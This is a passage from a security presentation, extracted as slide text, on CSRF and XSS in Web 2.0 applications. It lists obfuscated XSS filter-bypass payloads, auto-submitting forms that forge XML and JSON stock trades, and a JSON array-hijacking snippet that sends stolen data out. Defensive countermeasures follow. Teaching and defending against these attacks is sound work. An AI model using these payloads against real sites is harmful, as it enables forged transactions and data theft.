controls ';alert(String.fromCharCode(8 8,83,83))//';alert(String.fromC harCode(88,83,83))//quot;;alert(St ring.fromCharCode(88,83,83) )//quot;;alert(String.fromCharCod e(88,83,83))//-- ></SCRIPT>quot;>'><SCRIPT>al ert(String.fromCharCode(88,8 3,83))</SCRIPT> © Blueinfy Solutions Pvt. Ltd.
38.
Obfuscation to bypass
controls <SCRIPT SRC=http://url/xss.js></SCRIPT> <IMG SRC=quot;javascript:alert('XSS');quot;> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert("XSS") > <IMG SRC=`javascript:alert(quot;XSSquot;)`> Image tag malformed - <IMG quot;quot;quot;><SCRIPT>alert(quot;XSSquot;)</SCRIPT>quot; > © Blueinfy Solutions Pvt. Ltd.
39.
Obfuscation to bypass
controls <IMG SRC=javascript:alert(String.fromCharC ode(88,83,83))> Unicode encoding - <IMG SRC=javas cript: ;alert 0;'XSS')> © Blueinfy Solutions Pvt. Ltd.
40.
Obfuscation to bypass
controls UTF-8 - <IMG SRC=ja 8asc� 000114ip 16:al&# 0000101rt� 040'XS& #0000083')> © Blueinfy Solutions Pvt. Ltd.
41.
Obfuscation to bypass
controls Hex - <IMG SRC=javas& #x63ript:&# x61lert(&#x 27XSS')> XSS breakup - <IMG SRC=quot;jav ascript:alert('XSS');quot;> <IMG SRC=quot;jav	ascript:alert('XSS');quot;> © Blueinfy Solutions Pvt. Ltd.
42.
CSRF and Web
2.0 © Blueinfy Solutions Pvt. Ltd.
43.
Web 2.0 and
CSRF Web 2.0 applications can be vulnerable to different type of CSRF It can be with different structures One needs to look at it as well © Blueinfy Solutions Pvt. Ltd.
44.
Architecture
© Blueinfy Solutions Pvt. Ltd.
45.
Architecture - Layers
Browser Structures Protocols Server-Side JSON-RPC Ajax Flash / RIA Services XML REST HTML/CSS JavaScript SaaS JSON XML-RPC Widget DOM Open APIs SOAP HTTP(S) © Blueinfy Solutions Pvt. Ltd.
46.
Web 2.0 Changes Application
Infrastructure Vector Web 1.0 Web 2.0 Protocols HTTP & HTTPS SOAP, XML-RPC, REST etc. over HTTP & HTTPS Information HTML transfer XML, JSON, JS Objects etc. structures Communication Synchronous Asynchronous & Cross methods Postback domains Refresh and Redirect (proxy) Information sharing Single place Multiple sources (Urge for information (No integrated urge for integration) information platform) © Blueinfy Solutions Pvt. Ltd.
47.
Ajax/RIA call
Asynchronous JavaScript and XML HTML / CSS / Flash Database / Resource JS / DOM XML / Middleware / Text XMLHttpRequest (XHR) Web Server Asynchronous over HTTP(S) © Blueinfy Solutions Pvt. Ltd.
48.
Web 2.0 Structures
& Cross Domain Calls © Blueinfy Solutions Pvt. Ltd.
49.
Application Structures Ajax
running with various different structures Developers are adding various different calls and methods for it JavaScript can talk with back end sources Mashups application talking with various sources It has significant security impact. JSON, Array, JS-Object etc Identifying and Discovery of structures and CSRF © Blueinfy Solutions Pvt. Ltd.
50.
CSRF with various
streams JSON XML JS-Script JS-Object JS-Array © Blueinfy Solutions Pvt. Ltd.
51.
Addressing Cross Domain
Calls – CSRF opening Cross Domain calls are very important for Web 2.0 applications. – Proxy to talk with cross domain – Callback implementation to fetch them – Flash via crossdomain.xml These are types of bypass and can have security implications Source of the information – key! © Blueinfy Solutions Pvt. Ltd.
52.
Cross Domain with
proxy © Blueinfy Solutions Pvt. Ltd.
53.
Callback Implementation • Portals
like yahoo and google are supporting this. • Possible to bypass the SOP and make Cross Domain Calls • Security at stake [Browser layer] © Blueinfy Solutions Pvt. Ltd.
54.
CSRF for 2.0
© Blueinfy Solutions Pvt. Ltd.
55.
Cross Site Request
Forgery (CSRF) What is different with Web 2.0 – Is it possible to do CSRF to XML stream – How? – It will be POST hitting the XML processing resources like Web Services – JSON CSRF is also possible – Interesting check to make against application and Web 2.0 resources © Blueinfy Solutions Pvt. Ltd.
56.
One Way CSRF
Scenario © Blueinfy Solutions Pvt. Ltd.
57.
One Way CSRF
Scenario © Blueinfy Solutions Pvt. Ltd.
58.
One Way CSRF
Scenario © Blueinfy Solutions Pvt. Ltd.
59.
One Way CSRF
Scenario © Blueinfy Solutions Pvt. Ltd.
60.
One-Way CSRF
© Blueinfy Solutions Pvt. Ltd.
61.
One-Way CSRF <html> <body> <FORM NAME=quot;buyquot;
ENCTYPE=quot;text/plainquot; action=quot;http://trade.example.com/xmlrpc/trade.r emquot; METHOD=quot;POSTquot;> <input type=quot;hiddenquot; name='<?xml version' value='quot;1.0quot;?><methodCall><methodName>sto cks.buy</methodName><params><param><val ue><string>MSFT</string></value></param><p aram><value><double>26</double></value></ param></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> © Blueinfy Solutions Pvt. Ltd.
62.
Forcing XML Splitting XML
stream in the form. Possible through XForms as well. Similar techniques is applicable to JSON as well. © Blueinfy Solutions Pvt. Ltd.
63.
Similar with JSON {quot;symbolquot;:
quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;nonequot;} <FORM NAME=quot;buyquot; ENCTYPE=quot;text/plainquot; action=quot;http://trade.example.com/trade/ajax-buy/buy.aspxquot; METHOD=quot;POSTquot;> <input type=quot;hiddenquot; name='{quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;' value='noquot;}'> </FORM> <script>document.buy.submit();</script> POST /trade/ajax-buy/buy.aspx HTTP/1.1 Host: trade.example.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://trade.example.com/trade/json-buy/json-CSRF.html Content-Type: text/plain Content-Length: 53 {quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;=noquot;} © Blueinfy Solutions Pvt. Ltd.
64.
Two-Way CSRF One-Way –
Just making forceful request. Two-Way – Reading the data coming from the target – May be getting hold onto important information – profile, statements, numbers etc. – Is it possible with JSON/XML © Blueinfy Solutions Pvt. Ltd.
65.
Two-Way CSRF
© Blueinfy Solutions Pvt. Ltd.
66.
Two-Way CSRF
© Blueinfy Solutions Pvt. Ltd.
67.
Two-Way CSRF Application is
serving various streams like – JSON, JS- Object, Array etc. © Blueinfy Solutions Pvt. Ltd.
68.
Two-Way CSRF Attacker page
can make cross domain request using SCRIPT (firefox) Following code can overload the array stream. function Array() { var obj = this; var index = 0; for(j=0;j<4;j++){ obj[index++] setter = spoof; } } function spoof(x){ send(x.toString()); } © Blueinfy Solutions Pvt. Ltd.
69.
Two-Way CSRF
© Blueinfy Solutions Pvt. Ltd.
70.
Two-Way CSRF It is
possible to overload these objects. Reading and sending to cross domain possible. Opens up two way channel for an attacker. Web 2.0 streams are vulnerable to these attacks. © Blueinfy Solutions Pvt. Ltd.
71.
Scenario
JSON Vulnerable stream coming Blog feed through proxy Posting to the site [Malicious code] proxy Web app DB attacker Web Server Web app JSON Web Client CSRF Target © Blueinfy Solutions Pvt. Ltd.
72.
Web 2.0 Components There
are various other components for Web 2.0 Applications – Can serve as CSRF payload – RSS feeds – Mashups – Widgets – Blogs – Flash based components © Blueinfy Solutions Pvt. Ltd.
73.
RSS feeds RSS feeds
coming into application from various un- trusted sources. Feed readers are part of 2.0 Applications. Vulnerable to XSS or CSRF. Malicious code can be executed on the browser. Several vulnerabilities reported. © Blueinfy Solutions Pvt. Ltd.
74.
RSS feeds
© Blueinfy Solutions Pvt. Ltd.
75.
Mashups API exposure for
Mashup supplier application. Cross Domain access by callback may cause CSRF. Mashup application can be man in the middle so can’t trust or must be trusted one. © Blueinfy Solutions Pvt. Ltd.
76.
Widgets/Gadgets DOM sharing model
can cause many security issues. One widget can change information on another widget – possible. CSRF injection through widget code. © Blueinfy Solutions Pvt. Ltd.
77.
Blogs Blogs are common
to Web 2.0 applications. Many applications are plugging third party blogs One needs to check these blogs – CSRF is common with blogging applications. © Blueinfy Solutions Pvt. Ltd.
78.
Defense against CSRF
© Blueinfy Solutions Pvt. Ltd.
79.
Unique tokens
URL tokens – dynamically generated Form tokens – hidden <input type=quot;submitquot; class=quot;submitquot; value=quot;Loginquot; /> <input type=quot;hiddenquot; name=quot;formTokenquot; value=quot;d5cb8550af604bfb103dae89445fde69quot;> © Blueinfy Solutions Pvt. Ltd.
80.
Captchas Can have image/text
based captchas for important forms This will add protection against CSRFs Banking and financial applications can add several transaction ids for users © Blueinfy Solutions Pvt. Ltd.
81.
Referer check Checking referrer
to identify from where requests are coming Same domain or request from specific resource should be entertained Referer: http://www.google.com/ © Blueinfy Solutions Pvt. Ltd.
82.
Session and Logout Client
side – self defense – Logout after activities at earliest – Doing banking and other critical operations from separate browser – Browsing from VM On server side session duration should be small © Blueinfy Solutions Pvt. Ltd.
83.
Web 2.0 Specific Server
Side Checks – Check for client’s content-type. – XHR calls – xml/application. – Native calls – text/html. – Filtering is possible on it. Client Side Checks – Stream can be started and terminated by /* or any predefined characters. – Client can remove them before injecting to DOM. © Blueinfy Solutions Pvt. Ltd.
84.
Warning Discussed countermeasures are not
bullet proof but raise the bar There is no perfect security for CSRF – browsers are designed and work that allows CSR XSS on the site gives a leverage for CSRF - No XSS! © Blueinfy Solutions Pvt. Ltd.
85.
Conclusion CSRF is indeed
a sleeping giant Understanding is important and need to put countermeasures at code level No full proof defense available but there are ways to protect applications or part of applications Web 2.0 – adds new dimension to CSRF © Blueinfy Solutions Pvt. Ltd.
86.
http://shreeraj.blogspot.com
http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.com Questions © Blueinfy Solutions Pvt. Ltd.